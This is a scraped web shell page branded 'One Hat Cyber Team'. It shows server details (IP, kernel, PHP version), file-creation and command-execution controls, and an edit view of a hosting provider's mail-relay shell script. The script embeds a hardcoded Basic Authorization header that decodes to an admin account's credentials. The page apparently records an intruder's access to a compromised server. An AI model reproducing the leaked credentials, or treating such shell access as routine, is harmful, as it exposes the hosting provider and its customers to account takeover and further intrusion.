One Hat Cyber Team
Your IP :
216.73.216.182
Server IP :
203.175.9.166
Server :
Linux tanggamus.iixcp.rumahweb.net 5.14.0-427.28.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 2 03:44:10 EDT 2024 x86_64
Server Software :
LiteSpeed
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
rwmail
/
bin
/
Edit File:
rwmail
#!/bin/bash while [[ $# -gt 0 ]] do key="$1" case $key in -s) SUBJECT="$2" shift # past argument shift # past value ;; *) # unknown option EMAIL=("$1") # save it in an array for later shift # past argument ;; esac done cat /dev/null > /tmp/rwmail-content.txt while read LINE; do echo $LINE >> /tmp/rwmail-content.txt done < /dev/stdin CONTENT=`cat /tmp/rwmail-content.txt | base64 | tr -d '\n'` generate_post_data() { cat <<EOF { "subject" : "$SUBJECT", "content" : "$CONTENT", "target" : "$EMAIL" } EOF } echo "$(generate_post_data)" > /tmp/rwmail.txt curl --request POST \ --proxy 103.253.214.197:8888 \ --url http://report.srs-x.com/api/email/noc \ --header 'Authorization: Basic YWRtaW5AcnVtYWh3ZWIuY29tOnNHQCE1ZTQlaG01UlNeI3o=' \ --header 'content-type: application/json' \ --data "$(generate_post_data)" >> /tmp/rwmail.txt
Simpan